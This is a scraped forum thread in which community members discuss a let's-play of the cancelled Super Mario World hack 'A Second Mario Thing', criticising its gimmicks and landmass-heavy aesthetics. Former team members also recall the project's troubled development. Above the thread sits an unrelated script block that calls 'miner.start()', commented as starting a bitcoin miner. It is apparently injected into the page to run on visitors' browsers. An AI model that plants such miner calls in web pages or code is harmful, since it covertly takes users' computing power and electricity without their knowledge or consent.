<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitypge project

A Second Mario Thing: free alex

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
TheGuyWhoIsSitting

Re: A Second Mario Thing: SNN and alex2's little baby

Postby TheGuyWhoIsSitting » 6 years ago

I haven't seen it mentioned, but why does the sound on these videos sound like a 240p video's sound, but on a video that is actually good quality?

Saturn Moriya

Postby Saturn Moriya » 6 years ago

Alright, I now actually played from the start of the hack through the first three levels in a toolless fashion.

Menagerie In Glass feels like going through plains with some silly stuff painted on top of it, and a bunch of non-obstacles. It's okay, but it goes on too long.

Intertwined Plains looks like a great level, but the gimmick makes it tedious and it makes you wish it would just end...

Stroll Beneath The Stars is a level with that good ol' "super pretty" look to it. The level design is just not very interesting and with that lack of variation...it goes on a bit too long.

One of these things is just like the others, all of these things just shouldn't be as longandmaybehavethatgimmickremoved~

Your blood their blood serves the same!!

PKBeloved
Don't ask about the space plants

Postby PKBeloved » 6 years ago

welp, I end up having to leave for a few weeks due to homework, I come back and I am rewarded with VIDEOS GAMES

I must say this looks really good for just the base rom, it would have made a great rom hack.
Good lord I said some stupid stuff here when I was younger
Image Ver.2.1 now with a balanced fighting system, that lost of fun to play to be honest. You'll notice when playing that Demo has more HP and Strange, as where Iris has more PP and defense, she also grows just a bit faster, but her states grow slower. Also, furba sprites has been finished!

Alice
Pronouns: Girl person

Postby Alice » 6 years ago

TheGuyWhoIsSitting wrote:I haven't seen it mentioned, but why does the sound on these videos sound like a 240p video's sound, but on a video that is actually good quality?
Maybe it's just me but the video quality itself seems subpar compared to usual for raocow too. It says 480p but it looks more like 360p to me.

Septentrion Pleiades
Banned
First name: Stephen

Postby Septentrion Pleiades » 6 years ago

Therealninjaboy released a bunch of A2MT videos including an old version of Intertwine Plains

One thing with the tails155 style tiles is that some layer priority tile mix with background tiles so it's a glaring type of cutoff if you run into it. By the time I was submitting levels, the project leaders were hardasses about those things but that's apparently not the case back then.

Saturn Moriya

I just legit played Smoldering Stones and eh...it's pretty good in some parts, pretty bad in others. The gimmick works for the boss fight, but other than that it's just kinda there.

When you make a level wherein your only hazard is Thwomps, it essentially becomes a wait and bait level (also some of those diagonal ones are placed in such a way that you'll never see them coming until they've hit you). This makes the "you gotta jump every two seconds" gimmick just another layer of timing; another layer of having to wait around a bit longer for some of the thwomps.

I really like the boss though. And that chest is pretty awesome too.

I'm not finishing THUMP. It's pretty much a What The Hell level, that's all I'll say.

alex2
Banned

Postby alex2 » 6 years ago

Dunno about the rest of you, but I'm real sick of the "tails landmasses" by now. Seems like an excuse to add "aesthetic" to your level without actually being creative at all.

bleh
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:

Grounder

Postby Grounder » 6 years ago

It's only been like three episodes so far, Alex.

Things are probably just going to continue for the most part.

(And shouldn't you of all people be expecting more of it?) :|
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

alex2
Banned

Grounder wrote:It's only been like three episodes so far, Alex.

Things are probably just going to continue for the most part.

(And shouldn't you of all people be expecting more of it?) :|
What is there to expect? I've played every level in this hack several times over. I already know what's coming.
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
My mosts things:

Saturn Moriya

alex2 wrote:Dunno about the rest of you, but I'm real sick of the "tails landmasses" by now. Seems like an excuse to add "aesthetic" to your level without actually being creative at all.
Yeah...the problem is that on an aesthetic level pretty much everything has been done (unless you make custom graphics of whatever object you can think of). Level design needs to be the thing that shines through. Really doesn't happen in today's video's levels.

Sniggerb0bble
These arms ain't ever going down.

Postby Sniggerb0bble » 6 years ago

Peeps who still follow smw hacking closely: Are Tails155 landmasses still much of a thing nowadays? I'm curious to know whether or not that whole aesthetic idea was more just of a passing trend that was still in during A2MT development, or whether it's still a common thing.

If it was just a trend thing then I guess design-wise that's less of a sin in my eyes because people tend to follow what's popular... even if it doesn't deserve it. Still doesn't excuse the bad aesthetic decision, but I'm just curious.

S.N.N.

Postby S.N.N. » 6 years ago

Agreeing with alex2 in that the "Tails_155" style of landmasses has really ruined a lot of potential that hacks had (not because the style itself is a bad idea, but because he and several others insist on over-decorating to the point where the level is a badly designed clusterfuck).

Sniggerb0bble: Substantially less nowadays. I just finished playing the entries for the VLDC on SMWC, and it's one of the best years yet in terms of actual good design over a bunch of shitty disgusting landmasses.

sedron
im proud of you kid

Postby sedron » 6 years ago

The first three levels of the hack all use those Tails landmasses? They kind of cease to look as interesting when they're constantly in your face, and Intertwined Plains goes possibly way too far with them.

Intertwined Plains seems like kind of a poor level for a few reasons. Obviously the gimmick is very slapped-on, and arguably not very fun to begin with. Calm strolling-Mario could be a nice early-game gimmick in a level that's actually built for it, but what we see here is a wide-open, huge expanse of land that's perfect for running and jumping. If the level were more focused and were aesthetically designed to be calmer as well (YI athletic is NOT calm walking music,) the gimmick could have been something. Add on to that the absence of a midpoint, a semi-blind jump for the last Parrot coin, only getting one shot at said coin before having to repeat the entire stage, nonsense walk-through land masses, a stupidly punishing reset door for a dumb "puzzle," and overall bland stage design and you get a stage that sadly doesn't amount to all that much.

A Stroll Beneath The Stars is honestly kind of dull, in more ways than one. The entire stage is comprised of really lifeless colors, and the cave interior especially is just so boring looking. In terms of level design, it fails to do anything the previous levels did, which is kind of problematic when they didn't really do much to begin with. It's lower in difficulty than both preceding levels, so that's a thing too (though not one that would really be Tails' fault, most likely.) The cave background with the forest background trick is neat, but there really isn't much here otherwise. The level lacks substance, I guess.

alex2
Banned

sedron wrote:words
this is how you give criticism, guys
My mosts things:

MonkeyShrapnel
Poke a Man
First name: Brian
Pronouns: he/him/his

Postby MonkeyShrapnel » 6 years ago

I know that A Stroll Beneath The Stars was fairly average in terms of level design but man did it look pretty, at least I think so.

but what do i know gosh
Uh...Do I just sign here? What do you mean it should be obvious? There are people in this world...well...a whole lot of people that can't follow basic instructions!

My silly "Collab" Youtube channel https://www.youtube.com/user/Theguyswho ... s/featured
(That means I'm the only person using it nowadays.)

Saturn Moriya

alex2 wrote:
(╯°□°)╯︵ ┻━┻

I JUST

WANT TO BE POINTFUL FOR SOMETHING
Last edited by Saturn Moriya on 05 Jun 2014, 19:40, edited 1 time in total.

Eathanu

Postby Eathanu » 6 years ago

alex2 wrote:
No, it's way too polite and to the point.

Also, I don't really see Tails155's own style in his levels? They look nice aesthetically, but mostly they're just terrain bits mixing in interesting ways, not so much detailed background designs.

memnarch

Postby memnarch » 6 years ago

Hehe, raocow named the episode zombie a2mt. I like that.
Same person from Giantitp.com

(pronounced mem-nark)

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 6 years ago

...hmm. When I talked about A2MT being "the best SMW hack ever", I... was not informed of this manager who insisted every level needed some kind of ASM gimmick. Almost every control-altering gimmick I've seen in SMW hacks have been woefully unfun, even if the stage is *designed* with them in mind, let alone tacked on at the end for the sake of making a level "memorable"... which it *does*, but in all the wrong ways.

I'm beginning to get a clear picture now of why this project was eventually cancelled. The project definitely had potential, but it seems like a lot of bad ideas made earlier in development really messed up the whole thing. It's kind of inevitable when you're dealing with several different types of mindsets over what makes a game good that things are going to go down the drain quickly. I don't blame Alex; it seems like he inherited the project after a lot of these bad ideas were already shoehorned in, and did his best to deal with the crap hand he was dealt.

On the positive side, though, I don't feel like this was a wasted effort. If nothing else, it provided hacking and level-building experience for those involved, which can potentially lead to superior hacks/games down the road.
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

Kil

Postby Kil » 6 years ago

Boy that sure is a lot of shit going on in the background that is massively improving my game experience

This is like proto SMBX palm tree spam
DON'T PM me. Ask your question in the help thread so everyone can be answered.

Menshay

Postby Menshay » 6 years ago

Quick someone stick those landmasses in the hole at the bottom of the ocean.

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 6 years ago

Where is Aslanmarill, did his copy of FFX/X-2 eat him whole or something
Menshay wrote:Quick someone stick those landmasses in the hole at the bottom of the ocean.
Which of them, Sniggerb0bble's or Pichu's?
twitter (spicy at times!) | romhacking twitter (cats!!!) | GitHub | avatar by kuma

who cares:

:pan_pride:

limepie20

Postby limepie20 » 6 years ago

Jesuiscontent wrote:Cute level ASH AND MARILL

Also was condortalon seriously leader at some point???
No condortalon never had anything to do with the hack. I think the person raocow was referring to was either Tails_155 or flameofdoubt. I may have been the one to actually suggest the no walking gimmick, I don't really remember. But I do know the "every memorable level" philosophy was one of theirs. I think it was Tails, but I do remember flameofdoubt wanting people to shoehorn stuff like that in during clearing. Like my level "A Beach" has a boss at the end just because he said he thought it needed a more conclusive ending or something.
yoshicookiezeus wrote:
Bwarch wrote:No. The overworld and the levels are incompatible at this time..
Wasn't that just an issue of the OW and some levels using the same ExGFX files, though? Because that should be easily fixed by just changing the numbers around.
Yeah, that's right. It's just that it's very tedious, and we were too burnt out to actually get it done once it came around.
KobaBeach wrote:Where is Aslanmarill, did his copy of FFX/X-2 eat him whole or something
I don't think he's even aware of this LP.

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 6 years ago

limepie20 wrote:(...) I do remember flameofdoubt wanting people to shoehorn stuff like that in during clearing. Like my level "A Beach" has a boss at the end just because he said he thought it needed a more conclusive ending or something.
That is the dumbest excuse ever
limepie20 wrote:
KobaBeach wrote:Where is Aslanmarill, did his copy of FFX/X-2 eat him whole or something
I don't think he's even aware of this LP.
I'm not PMing him
Last edited by KobaBeach on 05 Jun 2014, 23:33, edited 1 time in total.
twitter (spicy at times!) | romhacking twitter (cats!!!) | GitHub | avatar by kuma

who cares:

:pan_pride:

limepie20

Postby limepie20 » 6 years ago

KobaBeach wrote: I'm not PMing him
Me neither.

Return to “let's play”